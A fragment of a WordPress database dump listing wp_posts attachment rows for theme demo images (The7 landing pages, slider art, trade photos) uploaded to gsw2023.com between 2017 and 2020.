(1176,1,'2017-01-16 17:47:24','2017-01-16 17:47:24','','slider-logo-img-tiny.png','','inherit','closed','closed','','slider-logo-img-tiny-png','','','2017-01-16 17:47:24','2017-01-16 17:47:24','',0,'https://gsw2023.com/wp-content/uploads/2017/01/slider-logo-img-tiny.png',0,'attachment','image/png',0),
(1182,1,'2017-01-16 18:09:04','2017-01-16 18:09:04','','d-creative-agency','','inherit','open','closed','','d-creative-agency-2','','','2017-01-16 18:09:04','2017-01-16 18:09:04','',2150,'https://gsw2023.com/wp-content/uploads/2016/11/d-creative-agency-1.jpg',0,'attachment','image/jpeg',0),
(1183,1,'2017-01-16 18:09:06','2017-01-16 18:09:06','','d-hosting','','inherit','open','closed','','d-hosting-2','','','2017-01-16 18:09:06','2017-01-16 18:09:06','',2150,'https://gsw2023.com/wp-content/uploads/2016/11/d-hosting-1.jpg',0,'attachment','image/jpeg',0),
(1196,1,'2017-01-20 13:27:36','2017-01-20 13:27:36','','d-more-coming-soon','','inherit','open','closed','','d-more-coming-soon','','','2017-01-20 13:27:36','2017-01-20 13:27:36','',2150,'https://gsw2023.com/wp-content/uploads/2016/11/d-more-coming-soon.jpg',0,'attachment','image/jpeg',0),
(1213,1,'2017-03-28 18:43:14','2017-03-28 17:43:14','','d-conference','','inherit','open','closed','','d-conference','','','2017-03-28 18:43:14','2017-03-28 17:43:14','',2150,'https://gsw2023.com/wp-content/uploads/2016/11/d-conference.jpg',0,'attachment','image/jpeg',0),
(1221,1,'2017-03-28 19:21:10','2017-03-28 18:21:10','','d-blog-and-news','','inherit','open','closed','','d-blog-and-news','','','2017-03-28 19:21:10','2017-03-28 18:21:10','',2150,'https://gsw2023.com/wp-content/uploads/2016/11/d-blog-and-news.jpg',0,'attachment','image/jpeg',0),
(1225,1,'2017-03-28 19:25:28','2017-03-28 18:25:28','','d-digital-agency','','inherit','open','closed','','d-digital-agency-2','','','2017-03-28 19:25:28','2017-03-28 18:25:28','',2150,'https://gsw2023.com/wp-content/uploads/2016/11/d-digital-agency-1.jpg',0,'attachment','image/jpeg',0),
(1234,1,'2017-03-29 20:28:09','2017-03-29 19:28:09','','l-001-hd','','inherit','open','closed','','l-001-hd','','','2017-03-29 20:28:09','2017-03-29 19:28:09','',0,'https://gsw2023.com/wp-content/uploads/2017/03/l-001-hd.png',0,'attachment','image/png',0),
(1235,1,'2017-03-29 20:28:10','2017-03-29 19:28:10','','l-001','','inherit','open','closed','','l-001','','','2017-03-29 20:28:10','2017-03-29 19:28:10','',0,'https://gsw2023.com/wp-content/uploads/2017/03/l-001.png',0,'attachment','image/png',0),
(1243,1,'2017-04-07 07:51:41','2017-04-07 06:51:41','','d-book-store','','inherit','open','closed','','d-book-store','','','2017-04-07 07:51:41','2017-04-07 06:51:41','',2150,'https://gsw2023.com/wp-content/uploads/2016/11/d-book-store.jpg',0,'attachment','image/jpeg',0),
(1267,1,'2017-04-21 11:44:17','2017-04-21 10:44:17','','d-travel','','inherit','open','closed','','d-travel','','','2017-04-21 11:44:17','2017-04-21 10:44:17','',2150,'https://gsw2023.com/wp-content/uploads/2016/11/d-travel.jpg',0,'attachment','image/jpeg',0),
(1285,1,'2017-05-02 13:30:16','2017-05-02 12:30:16','','d-pers-cr','','inherit','open','closed','','d-pers-cr','','','2017-05-02 13:30:16','2017-05-02 12:30:16','',2150,'https://gsw2023.com/wp-content/uploads/2016/11/d-pers-cr.jpg',0,'attachment','image/jpeg',0),
(1295,1,'2017-05-26 14:22:11','2017-05-26 13:22:11','','d-app-blue','','inherit','open','closed','','d-app-blue','','','2017-05-26 14:22:11','2017-05-26 13:22:11','',2150,'https://gsw2023.com/wp-content/uploads/2016/11/d-app-blue.jpg',0,'attachment','image/jpeg',0),
(1312,1,'2017-06-30 10:20:51','2017-06-30 09:20:51','','d-corp','','inherit','open','closed','','d-corp','','','2017-06-30 10:20:51','2017-06-30 09:20:51','',2150,'https://gsw2023.com/wp-content/uploads/2016/11/d-corp.jpg',0,'attachment','image/jpeg',0),
(1338,1,'2017-07-03 15:24:03','2017-07-03 14:24:03','','webdesign-showcase','','inherit','open','closed','','webdesign-showcase','','','2017-07-03 15:24:03','2017-07-03 14:24:03','',2150,'https://gsw2023.com/wp-content/uploads/2016/11/webdesign-showcase.jpg',0,'attachment','image/jpeg',0),
(1340,1,'2017-07-03 15:32:55','2017-07-03 14:32:55','','showcase-yoga','','inherit','open','closed','','showcase-yoga','','','2017-07-03 15:32:55','2017-07-03 14:32:55','',2150,'https://gsw2023.com/wp-content/uploads/2016/11/showcase-yoga.jpg',0,'attachment','image/jpeg',0),
(1342,1,'2017-07-03 15:47:17','2017-07-03 14:47:17','','showcase-oana-photo','','inherit','open','closed','','showcase-oana-photo','','','2017-07-03 15:47:17','2017-07-03 14:47:17','',2150,'https://gsw2023.com/wp-content/uploads/2016/11/showcase-oana-photo.jpg',0,'attachment','image/jpeg',0),
(1355,1,'2017-07-28 08:41:03','2017-07-28 07:41:03','','d-small-store','','inherit','open','closed','','d-small-store','','','2017-07-28 08:41:03','2017-07-28 07:41:03','',2150,'https://gsw2023.com/wp-content/uploads/2016/11/d-small-store.jpg',0,'attachment','image/jpeg',0),
(1395,1,'2017-11-29 19:37:09','2017-11-29 19:37:09','','d-agency','','inherit','open','closed','','d-agency','','','2017-11-29 19:37:09','2017-11-29 19:37:09','',2150,'https://gsw2023.com/wp-content/uploads/2017/11/d-agency.jpg',0,'attachment','image/jpeg',0),
(1405,1,'2018-01-24 17:23:14','2018-01-24 17:23:14','','d-dental','','inherit','open','closed','','d-dental','','','2018-01-24 17:23:14','2018-01-24 17:23:14','',2150,'https://gsw2023.com/wp-content/uploads/2018/01/d-dental.jpg',0,'attachment','image/jpeg',0),
(1410,1,'2018-01-30 17:16:27','2018-01-30 17:16:27','','d-law-firm','','inherit','open','closed','','d-law-firm','','','2018-01-30 17:16:27','2018-01-30 17:16:27','',2150,'https://gsw2023.com/wp-content/uploads/2018/01/d-law-firm.jpg',0,'attachment','image/jpeg',0),
(1414,1,'2018-02-01 15:38:30','2018-02-01 15:38:30','','showcase-shop','','inherit','open','closed','','showcase-shop','','','2018-02-01 15:38:30','2018-02-01 15:38:30','',2150,'https://gsw2023.com/wp-content/uploads/2018/02/showcase-shop.jpg',0,'attachment','image/jpeg',0),
(1422,1,'2018-02-13 10:51:31','2018-02-13 10:51:31','','demo-d-a','','inherit','open','closed','','demo-d-a','','','2018-02-13 10:51:31','2018-02-13 10:51:31','',2150,'https://gsw2023.com/wp-content/uploads/2018/02/demo-d-a.jpg',0,'attachment','image/jpeg',0),
(1480,1,'2018-06-27 09:15:49','2018-06-27 08:15:49','','demo-event','','inherit','open','closed','','demo-event','','','2018-06-27 09:15:49','2018-06-27 08:15:49','',2150,'https://gsw2023.com/wp-content/uploads/2018/06/demo-event.jpg',0,'attachment','image/jpeg',0),
(1481,1,'2018-06-27 09:15:50','2018-06-27 08:15:50','','demo-soft','','inherit','open','closed','','demo-soft','','','2018-06-27 09:15:50','2018-06-27 08:15:50','',2150,'https://gsw2023.com/wp-content/uploads/2018/06/demo-soft.jpg',0,'attachment','image/jpeg',0),
(1512,1,'2018-10-10 09:27:33','2018-10-10 08:27:33','','art-1-left','','inherit','open','closed','','art-1-left','','','2018-10-10 09:27:33','2018-10-10 08:27:33','',0,'https://gsw2023.com/wp-content/uploads/2018/10/art-1-left.png',0,'attachment','image/png',0),
(1513,1,'2018-10-10 09:28:02','2018-10-10 08:28:02','','art-1-right','','inherit','open','closed','','art-1-right','','','2018-10-10 09:28:02','2018-10-10 08:28:02','',0,'https://gsw2023.com/wp-content/uploads/2018/10/art-1-right.png',0,'attachment','image/png',0),
(1516,1,'2018-10-10 14:31:58','2018-10-10 13:31:58','','art-02-left','','inherit','open','closed','','art-02-left','','','2018-10-10 14:31:58','2018-10-10 13:31:58','',0,'https://gsw2023.com/wp-content/uploads/2018/10/art-02-left.png',0,'attachment','image/png',0),
(1517,1,'2018-10-10 14:36:37','2018-10-10 13:36:37','','art-02-right','','inherit','open','closed','','art-02-right','','','2018-10-10 14:36:37','2018-10-10 13:36:37','',0,'https://gsw2023.com/wp-content/uploads/2018/10/art-02-right.png',0,'attachment','image/png',0),
(1519,1,'2018-10-10 14:41:58','2018-10-10 13:41:58','','art-3-left','','inherit','open','closed','','art-3-left','','','2018-10-10 14:41:58','2018-10-10 13:41:58','',0,'https://gsw2023.com/wp-content/uploads/2018/10/art-3-left.png',0,'attachment','image/png',0),
(1520,1,'2018-10-10 14:48:59','2018-10-10 13:48:59','','art-3-right','','inherit','open','closed','','art-3-right','','','2018-10-10 14:48:59','2018-10-10 13:48:59','',0,'https://gsw2023.com/wp-content/uploads/2018/10/art-3-right.png',0,'attachment','image/png',0),
(1521,1,'2018-10-10 15:00:34','2018-10-10 14:00:34','','art-002-left','','inherit','open','closed','','art-002-left','','','2018-10-10 15:00:34','2018-10-10 14:00:34','',0,'https://gsw2023.com/wp-content/uploads/2018/10/art-002-left.png',0,'attachment','image/png',0),
(1522,1,'2018-10-10 15:03:27','2018-10-10 14:03:27','','art-0002-left','','inherit','open','closed','','art-0002-left','','','2018-10-10 15:03:27','2018-10-10 14:03:27','',0,'https://gsw2023.com/wp-content/uploads/2018/10/art-0002-left.png',0,'attachment','image/png',0),
(1523,1,'2018-10-10 15:06:31','2018-10-10 14:06:31','','art-03-left','','inherit','open','closed','','art-03-left','','','2018-10-10 15:06:31','2018-10-10 14:06:31','',0,'https://gsw2023.com/wp-content/uploads/2018/10/art-03-left.png',0,'attachment','image/png',0),
(1531,1,'2018-10-11 10:59:01','2018-10-11 09:59:01','','logo-slider-landing','','inherit','open','closed','','logo-slider-landing','','','2018-10-11 10:59:01','2018-10-11 09:59:01','',0,'https://gsw2023.com/wp-content/uploads/2018/10/logo-slider-landing.png',0,'attachment','image/png',0),
(1532,1,'2018-10-14 09:09:21','2018-10-14 08:09:21','','number','','inherit','open','closed','','number','','','2018-10-14 09:09:21','2018-10-14 08:09:21','',0,'https://gsw2023.com/wp-content/uploads/2018/10/number.png',0,'attachment','image/png',0),
(1533,1,'2018-10-14 09:53:33','2018-10-14 08:53:33','','art-mob-slider','','inherit','open','closed','','art-mob-slider','','','2018-10-14 09:53:33','2018-10-14 08:53:33','',0,'https://gsw2023.com/wp-content/uploads/2018/10/art-mob-slider.png',0,'attachment','image/png',0),
(1536,1,'2018-10-14 10:21:13','2018-10-14 09:21:13','','live001','','inherit','open','closed','','live001','','','2018-10-14 10:21:13','2018-10-14 09:21:13','',2150,'https://gsw2023.com/wp-content/uploads/2018/10/live001.jpg',0,'attachment','image/jpeg',0),
(1539,1,'2018-10-14 13:14:37','2018-10-14 12:14:37','','art-01-landing','','inherit','open','closed','','art-01-landing','','','2018-10-14 13:14:37','2018-10-14 12:14:37','',2150,'https://gsw2023.com/wp-content/uploads/2018/10/art-01-landing.png',0,'attachment','image/png',0),
(1544,1,'2018-10-14 14:05:37','2018-10-14 13:05:37','','art-03-landing','','inherit','open','closed','','art-03-landing','','','2018-10-14 14:05:37','2018-10-14 13:05:37','',2150,'https://gsw2023.com/wp-content/uploads/2018/10/art-03-landing.jpg',0,'attachment','image/jpeg',0),
(1548,1,'2018-10-14 14:13:23','2018-10-14 13:13:23','','art-04-landing','','inherit','open','closed','','art-04-landing','','','2018-10-14 14:13:23','2018-10-14 13:13:23','',2150,'https://gsw2023.com/wp-content/uploads/2018/10/art-04-landing.png',0,'attachment','image/png',0),
(1553,1,'2018-10-14 15:15:02','2018-10-14 14:15:02','','art-001','','inherit','open','closed','','art-001','','','2018-10-14 15:15:02','2018-10-14 14:15:02','',2150,'https://gsw2023.com/wp-content/uploads/2018/10/art-001.jpg',0,'attachment','image/jpeg',0),
(1554,1,'2018-10-14 15:15:03','2018-10-14 14:15:03','','art-002','','inherit','open','closed','','art-002','','','2018-10-14 15:15:03','2018-10-14 14:15:03','',2150,'https://gsw2023.com/wp-content/uploads/2018/10/art-002.jpg',0,'attachment','image/jpeg',0),
(1555,1,'2018-10-14 15:15:03','2018-10-14 14:15:03','','art-003','','inherit','open','closed','','art-003','','','2018-10-14 15:15:03','2018-10-14 14:15:03','',2150,'https://gsw2023.com/wp-content/uploads/2018/10/art-003.jpg',0,'attachment','image/jpeg',0),
(1556,1,'2018-10-14 15:15:04','2018-10-14 14:15:04','','art-004','','inherit','open','closed','','art-004','','','2018-10-14 15:15:04','2018-10-14 14:15:04','',2150,'https://gsw2023.com/wp-content/uploads/2018/10/art-004.jpg',0,'attachment','image/jpeg',0),
(1558,1,'2018-10-14 15:18:57','2018-10-14 14:18:57','','art000','','inherit','open','closed','','art000','','','2018-10-14 15:18:57','2018-10-14 14:18:57','',2150,'https://gsw2023.com/wp-content/uploads/2018/10/art000.png',0,'attachment','image/png',0),
(1559,1,'2018-10-14 15:18:58','2018-10-14 14:18:58','','art001','','inherit','open','closed','','art001','','','2018-10-14 15:18:58','2018-10-14 14:18:58','',2150,'https://gsw2023.com/wp-content/uploads/2018/10/art001.png',0,'attachment','image/png',0),
(1560,1,'2018-10-14 15:18:58','2018-10-14 14:18:58','','art002','','inherit','open','closed','','art002','','','2018-10-14 15:18:58','2018-10-14 14:18:58','',2150,'https://gsw2023.com/wp-content/uploads/2018/10/art002.png',0,'attachment','image/png',0),
(1561,1,'2018-10-14 15:18:59','2018-10-14 14:18:59','','art004','','inherit','open','closed','','art004','','','2018-10-14 15:18:59','2018-10-14 14:18:59','',2150,'https://gsw2023.com/wp-content/uploads/2018/10/art004.png',0,'attachment','image/png',0),
(1564,1,'2018-10-14 15:27:24','2018-10-14 14:27:24','','art001-landing','','inherit','open','closed','','art001-landing','','','2018-10-14 15:27:24','2018-10-14 14:27:24','',2150,'https://gsw2023.com/wp-content/uploads/2018/10/art001-landing.jpg',0,'attachment','image/jpeg',0),
(1566,1,'2018-10-16 19:52:33','2018-10-16 18:52:33','','pl00','','inherit','open','closed','','pl00-2','','','2018-10-16 19:52:33','2018-10-16 18:52:33','',0,'https://gsw2023.com/wp-content/uploads/2018/10/pl00-1.png',0,'attachment','image/png',0),
(1567,1,'2018-10-16 19:52:34','2018-10-16 18:52:34','','pl01','','inherit','open','closed','','pl01-2','','','2018-10-16 19:52:34','2018-10-16 18:52:34','',0,'https://gsw2023.com/wp-content/uploads/2018/10/pl01-1.png',0,'attachment','image/png',0),
(1568,1,'2018-10-16 19:52:34','2018-10-16 18:52:34','','pl02','','inherit','open','closed','','pl02','','','2018-10-16 19:52:34','2018-10-16 18:52:34','',0,'https://gsw2023.com/wp-content/uploads/2018/10/pl02.png',0,'attachment','image/png',0),
(1569,1,'2018-10-16 19:52:35','2018-10-16 18:52:35','','pl03','','inherit','open','closed','','pl03-2','','','2018-10-16 19:52:35','2018-10-16 18:52:35','',0,'https://gsw2023.com/wp-content/uploads/2018/10/pl03-1.png',0,'attachment','image/png',0),
(1570,1,'2018-10-16 19:52:35','2018-10-16 18:52:35','','pl04','','inherit','open','closed','','pl04-2','','','2018-10-16 19:52:35','2018-10-16 18:52:35','',0,'https://gsw2023.com/wp-content/uploads/2018/10/pl04-1.png',0,'attachment','image/png',0),
(1571,1,'2018-10-16 19:52:35','2018-10-16 18:52:35','','pl05','','inherit','open','closed','','pl05-2','','','2018-10-16 19:52:35','2018-10-16 18:52:35','',0,'https://gsw2023.com/wp-content/uploads/2018/10/pl05-1.png',0,'attachment','image/png',0),
(1580,1,'2018-10-18 16:24:38','2018-10-18 15:24:38','','art-01-right_18_10_2018','','inherit','open','closed','','art-01-right_18_10_2018','','','2018-10-18 16:24:38','2018-10-18 15:24:38','',0,'https://gsw2023.com/wp-content/uploads/2018/10/art-01-right_18_10_2018.png',0,'attachment','image/png',0),
(1581,1,'2018-10-18 16:25:02','2018-10-18 15:25:02','','art-01-left_18_10_2018','','inherit','open','closed','','art-01-left_18_10_2018','','','2018-10-18 16:25:02','2018-10-18 15:25:02','',0,'https://gsw2023.com/wp-content/uploads/2018/10/art-01-left_18_10_2018.png',0,'attachment','image/png',0),
(1582,1,'2018-10-18 16:26:07','2018-10-18 15:26:07','','art-02-left_18_10_2018','','inherit','open','closed','','art-02-left_18_10_2018','','','2018-10-18 16:26:07','2018-10-18 15:26:07','',0,'https://gsw2023.com/wp-content/uploads/2018/10/art-02-left_18_10_2018.png',0,'attachment','image/png',0),
(1583,1,'2018-10-18 16:26:54','2018-10-18 15:26:54','','art-02-right_18_10_2018','','inherit','open','closed','','art-02-right_18_10_2018','','','2018-10-18 16:26:54','2018-10-18 15:26:54','',0,'https://gsw2023.com/wp-content/uploads/2018/10/art-02-right_18_10_2018.png',0,'attachment','image/png',0),
(1584,1,'2018-10-18 16:27:28','2018-10-18 15:27:28','','art-03-left_18_10_2018','','inherit','open','closed','','art-03-left_18_10_2018','','','2018-10-18 16:27:28','2018-10-18 15:27:28','',0,'https://gsw2023.com/wp-content/uploads/2018/10/art-03-left_18_10_2018.png',0,'attachment','image/png',0),
(1585,1,'2018-10-18 16:27:49','2018-10-18 15:27:49','','art-03-right_18_10_2018','','inherit','open','closed','','art-03-right_18_10_2018','','','2018-10-18 16:27:49','2018-10-18 15:27:49','',0,'https://gsw2023.com/wp-content/uploads/2018/10/art-03-right_18_10_2018.png',0,'attachment','image/png',0),
(1586,1,'2018-10-18 16:45:05','2018-10-18 15:45:05','','art-mob-slider_18_10_2018','','inherit','open','closed','','art-mob-slider_18_10_2018','','','2018-10-18 16:45:05','2018-10-18 15:45:05','',0,'https://gsw2023.com/wp-content/uploads/2018/10/art-mob-slider_18_10_2018.png',0,'attachment','image/png',0),
(1591,1,'2018-10-23 15:02:29','2018-10-23 14:02:29','','live008','','inherit','open','closed','','live008','','','2018-10-23 15:02:29','2018-10-23 14:02:29','',2150,'https://gsw2023.com/wp-content/uploads/2018/10/live008.jpg',0,'attachment','image/jpeg',0),
(1610,1,'2018-12-03 20:32:34','2018-12-03 20:32:34','','demo-gut','','inherit','open','closed','','demo-gut','','','2018-12-03 20:32:34','2018-12-03 20:32:34','',2150,'https://gsw2023.com/wp-content/uploads/2018/12/demo-gut.jpg',0,'attachment','image/jpeg',0),
(1644,1,'2019-01-15 08:48:44','2019-01-15 08:48:44','','the7-landing-g-creative-demo','','inherit','open','closed','','the7-landing-g-creative-demo','','','2019-01-15 08:48:44','2019-01-15 08:48:44','',2150,'https://gsw2023.com/wp-content/uploads/2019/01/the7-landing-g-creative-demo.jpg',0,'attachment','image/jpeg',0),
(1661,1,'2019-02-22 07:28:13','2019-02-22 07:28:13','','weed-demo-landing','','inherit','open','closed','','weed-demo-landing','','','2019-02-22 07:28:13','2019-02-22 07:28:13','',2150,'https://gsw2023.com/wp-content/uploads/2019/02/weed-demo-landing.jpg',0,'attachment','image/jpeg',0),
(1671,1,'2019-03-20 17:13:14','2019-03-20 17:13:14','','minimal-creative','','inherit','open','closed','','minimal-creative','','','2019-03-20 17:13:14','2019-03-20 17:13:14','',2150,'https://gsw2023.com/wp-content/uploads/2019/03/minimal-creative.jpg',0,'attachment','image/jpeg',0),
(1715,1,'2019-05-29 09:38:34','2019-05-29 08:38:34','','slider-bg','','inherit','open','closed','','slider-bg','','','2019-05-29 09:38:34','2019-05-29 08:38:34','',0,'https://gsw2023.com/wp-content/uploads/2019/05/slider-bg.jpg',0,'attachment','image/jpeg',0),
(1720,1,'2019-05-29 09:57:44','2019-05-29 08:57:44','','slider-plugins','','inherit','open','closed','','slider-plugins','','','2019-05-29 09:57:44','2019-05-29 08:57:44','',0,'https://gsw2023.com/wp-content/uploads/2019/05/slider-plugins.png',0,'attachment','image/png',0),
(1734,1,'2019-06-20 13:43:42','2019-06-20 12:43:42','','the7-mb-landing','','inherit','open','closed','','the7-mb-landing','','','2019-06-20 13:43:42','2019-06-20 12:43:42','',2150,'https://gsw2023.com/wp-content/uploads/2019/06/the7-mb-landing.jpg',0,'attachment','image/jpeg',0),
(1845,1,'2018-06-20 14:59:50','2018-06-20 13:59:50','','it-001-hd','','inherit','open','closed','','it-001-hd','','','2018-06-20 14:59:50','2018-06-20 13:59:50','',0,'https://gsw2023.com/wp-content/uploads/2018/06/it-001-hd.png',0,'attachment','image/png',0),
(1846,1,'2018-06-20 14:59:50','2018-06-20 13:59:50','','it-001','','inherit','open','closed','','it-001','','','2018-06-20 14:59:50','2018-06-20 13:59:50','',0,'https://gsw2023.com/wp-content/uploads/2018/06/it-001.png',0,'attachment','image/png',0),
(1872,1,'2019-07-17 10:19:36','2019-07-17 09:19:36','','dance-demo','','inherit','open','closed','','dance-demo','','','2019-07-17 10:19:36','2019-07-17 09:19:36','',0,'https://gsw2023.com/wp-content/uploads/2019/06/dance-demo.jpg',0,'attachment','image/jpeg',0),
(1875,1,'2019-07-18 10:49:25','2019-07-18 09:49:25','','d-m','','inherit','open','closed','','d-m','','','2019-07-18 10:49:25','2019-07-18 09:49:25','',0,'https://gsw2023.com/wp-content/uploads/2019/06/d-m.jpg',0,'attachment','image/jpeg',0),
(1876,1,'2018-06-20 15:59:32','2018-06-20 14:59:32','','trade02','','inherit','open','closed','','trade02','','','2018-06-20 15:59:32','2018-06-20 14:59:32','',388,'https://gsw2023.com/wp-content/uploads/2018/06/trade02.jpg',0,'attachment','image/jpeg',0),
(1877,1,'2018-06-20 15:59:33','2018-06-20 14:59:33','','trade03','','inherit','open','closed','','trade03','','','2018-06-20 15:59:33','2018-06-20 14:59:33','',388,'https://gsw2023.com/wp-content/uploads/2018/06/trade03.jpg',0,'attachment','image/jpeg',0),
(1879,1,'2019-07-19 15:22:56','2019-07-19 14:22:56','','church','','inherit','open','closed','','church','','','2019-07-19 15:22:56','2019-07-19 14:22:56','',0,'https://gsw2023.com/wp-content/uploads/2019/07/church.jpg',0,'attachment','image/jpeg',0),
(1882,1,'2018-06-20 16:02:29','2018-06-20 15:02:29','','trade06','','inherit','open','closed','','trade06','','','2018-06-20 16:02:29','2018-06-20 15:02:29','',388,'https://gsw2023.com/wp-content/uploads/2018/06/trade06.jpg',0,'attachment','image/jpeg',0),
(1886,1,'2019-08-27 17:56:36','2019-08-27 16:56:36','','7e-plugin','','inherit','open','closed','','7e-plugin','','','2019-08-27 17:56:36','2019-08-27 16:56:36','',0,'https://gsw2023.com/wp-content/uploads/2019/08/7e-plugin.png',0,'attachment','image/png',0),
(1887,1,'2019-08-27 18:06:41','2019-08-27 17:06:41','','the7-landing-featurs-plugins','','inherit','open','closed','','the7-landing-featurs-plugins','','','2019-08-27 18:06:41','2019-08-27 17:06:41','',2150,'https://gsw2023.com/wp-content/uploads/2019/08/the7-landing-featurs-plugins.png',0,'attachment','image/png',0),
(1892,1,'2018-06-20 16:22:05','2018-06-20 15:22:05','','icomoon-fontawesome-16x16','','inherit','open','closed','','icomoon-fontawesome-16x16','','','2018-06-20 16:22:05','2018-06-20 15:22:05','',0,'https://gsw2023.com/wp-content/uploads/2018/06/icomoon-fontawesome-16x16-1.zip',0,'attachment','application/zip',0),
(1896,1,'2018-06-20 16:32:04','2018-06-20 15:32:04','','trade07','','inherit','open','closed','','trade07','','','2018-06-20 16:32:04','2018-06-20 15:32:04','',388,'https://gsw2023.com/wp-content/uploads/2018/06/trade07.jpg',0,'attachment','image/jpeg',0),
(1897,1,'2018-06-20 16:32:05','2018-06-20 15:32:05','','trade08','','inherit','open','closed','','trade08','','','2018-06-20 16:32:05','2018-06-20 15:32:05','',388,'https://gsw2023.com/wp-content/uploads/2018/06/trade08.jpg',0,'attachment','image/jpeg',0),
(1899,1,'2018-06-20 16:34:26','2018-06-20 15:34:26','','trade09','','inherit','open','closed','','trade09','','','2018-06-20 16:34:26','2018-06-20 15:34:26','',388,'https://gsw2023.com/wp-content/uploads/2018/06/trade09.jpg',0,'attachment','image/jpeg',0),
(1918,1,'2018-06-20 17:01:35','2018-06-20 16:01:35','','trade11','','inherit','open','closed','','trade11','','','2018-06-20 17:01:35','2018-06-20 16:01:35','',0,'https://gsw2023.com/wp-content/uploads/2018/06/trade11.jpg',0,'attachment','image/jpeg',0),
(1951,1,'2018-06-20 17:38:13','2018-06-20 16:38:13','','trade15','','inherit','open','closed','','trade15','','','2018-06-20 17:38:13','2018-06-20 16:38:13','',0,'https://gsw2023.com/wp-content/uploads/2018/06/trade15.jpg',0,'attachment','image/jpeg',0),
(1959,1,'2019-10-23 10:00:43','2019-10-23 09:00:43','','demo-nutr','','inherit','open','closed','','demo-nutr','','','2019-10-23 10:00:43','2019-10-23 09:00:43','',0,'https://gsw2023.com/wp-content/uploads/2019/10/demo-nutr.jpg',0,'attachment','image/jpeg',0),
(1960,1,'2019-10-23 10:00:44','2019-10-23 09:00:44','','demo-wedding','','inherit','open','closed','','demo-wedding','','','2019-10-23 10:00:44','2019-10-23 09:00:44','',0,'https://gsw2023.com/wp-content/uploads/2019/10/demo-wedding.jpg',0,'attachment','image/jpeg',0),
(1961,1,'2019-10-23 10:00:44','2019-10-23 09:00:44','','demo-yoga','','inherit','open','closed','','demo-yoga','','','2019-10-23 10:00:44','2019-10-23 09:00:44','',0,'https://gsw2023.com/wp-content/uploads/2019/10/demo-yoga.jpg',0,'attachment','image/jpeg',0),
(1973,1,'2019-10-31 10:25:14','2019-10-31 10:25:14','','demo-dev-studio','','inherit','open','closed','','demo-dev-studio','','','2019-10-31 10:25:14','2019-10-31 10:25:14','',0,'https://gsw2023.com/wp-content/uploads/2019/10/demo-dev-studio.jpg',0,'attachment','image/jpeg',0),
(1984,1,'2018-06-20 18:11:29','2018-06-20 17:11:29','','trade18','','inherit','open','closed','','trade18','','','2018-06-20 18:11:29','2018-06-20 17:11:29','',0,'https://gsw2023.com/wp-content/uploads/2018/06/trade18.jpg',0,'attachment','image/jpeg',0),
(1986,1,'2018-06-20 18:16:06','2018-06-20 17:16:06','','trade19','','inherit','open','closed','','trade19','','','2018-06-20 18:16:06','2018-06-20 17:16:06','',0,'https://gsw2023.com/wp-content/uploads/2018/06/trade19.jpg',0,'attachment','image/jpeg',0),
(1987,1,'2018-06-20 18:16:07','2018-06-20 17:16:07','','trade20','','inherit','open','closed','','trade20','','','2018-06-20 18:16:07','2018-06-20 17:16:07','',0,'https://gsw2023.com/wp-content/uploads/2018/06/trade20.jpg',0,'attachment','image/jpeg',0),
(1988,1,'2019-12-10 11:35:49','2019-12-10 11:35:49','','the7-company-business-demo','','inherit','closed','closed','','the7-company-business-demo','','','2019-12-10 11:35:49','2019-12-10 11:35:49','',0,'https://gsw2023.com/wp-content/uploads/2019/12/the7-company-business-demo.jpg',0,'attachment','image/jpeg',0),
(1994,1,'2018-06-20 18:22:48','2018-06-20 17:22:48','','trade22','','inherit','open','closed','','trade22','','','2018-06-20 18:22:48','2018-06-20 17:22:48','',0,'https://gsw2023.com/wp-content/uploads/2018/06/trade22.jpg',0,'attachment','image/jpeg',0),
(2005,1,'2020-01-17 10:48:25','2020-01-17 10:48:25','','seven-constr-demo','','inherit','closed','closed','','seven-constr-demo','','','2020-01-17 10:48:25','2020-01-17 10:48:25','',0,'https://gsw2023.com/wp-content/uploads/2019/10/seven-constr-demo.jpg',0,'attachment','image/jpeg',0),
(2006,1,'2020-01-17 10:51:41','2020-01-17 10:51:41','','seven-shop-demo','','inherit','closed','closed','','seven-shop-demo','','','2020-01-17 10:51:41','2020-01-17 10:51:41','',0,'https://gsw2023.com/wp-content/uploads/2019/06/seven-shop-demo.jpg',0,'attachment','image/jpeg',0),
(2007,1,'2020-01-20 10:14:12','2020-01-20 10:14:12','','dentnew','','inherit','closed','closed','','dentnew','','','2020-01-20 10:14:12','2020-01-20 10:14:12','',0,'https://gsw2023.com/wp-content/uploads/2019/11/dentnew.jpg',0,'attachment','image/jpeg',0),
(2013,1,'2020-01-23 11:16:54','2020-01-23 11:16:54','','beauty-studio-renewed','','inherit','closed','closed','','beauty-studio-renewed','','','2020-01-23 11:16:54','2020-01-23 11:16:54','',0,'https://gsw2023.com/wp-content/uploads/2019/06/beauty-studio-renewed.jpg',0,'attachment','image/jpeg',0),
(2016,1,'2020-01-29 14:52:30','2020-01-29 14:52:30','','el-im','','inherit','closed','closed','','el-im','','','2020-01-29 14:52:30','2020-01-29 14:52:30','',0,'https://gsw2023.com/wp-content/uploads/2019/12/el-im.jpg',0,'attachment','image/jpeg',0),
(2017,1,'2020-01-29 14:52:31','2020-01-29 14:52:31','','wp-im','','inherit','closed','closed','','wp-im','','','2020-01-29 14:52:31','2020-01-29 14:52:31','',0,'https://gsw2023.com/wp-content/uploads/2019/12/wp-im.jpg',0,'attachment','image/jpeg',0),
(2020,1,'2020-01-30 12:16:16','2020-01-30 12:16:16','','photo-dem0','','inherit','closed','closed','','photo-dem0','','','2020-01-30 12:16:16','2020-01-30 12:16:16','',0,'https://gsw2023.com/wp-content/uploads/2019/06/photo-dem0.jpg',0,'attachment','image/jpeg',0),
(2021,1,'2020-01-31 12:45:44','2020-01-31 12:45:44','','seven-hotel-demo','','inherit','closed','closed','','seven-hotel-demo','','','2020-01-31 12:45:44','2020-01-31 12:45:44','',0,'https://gsw2023.com/wp-content/uploads/2019/06/seven-hotel-demo.jpg',0,'attachment','image/jpeg',0),
(2027,1,'2020-02-03 10:33:28','2020-02-03 10:33:28','','webmasterdemo','','inherit','closed','closed','','webmasterdemo','','','2020-02-03 10:33:28','2020-02-03 10:33:28','',0,'https://gsw2023.com/wp-content/uploads/2019/06/webmasterdemo.jpg',0,'attachment','image/jpeg',0),
(2028,1,'2020-02-03 13:03:35','2020-02-03 13:03:35','','businessdemo','','inherit','closed','closed','','businessdemo','','','2020-02-03 13:03:35','2020-02-03 13:03:35','',0,'https://gsw2023.com/wp-content/uploads/2019/06/businessdemo.jpg',0,'attachment','image/jpeg',0),
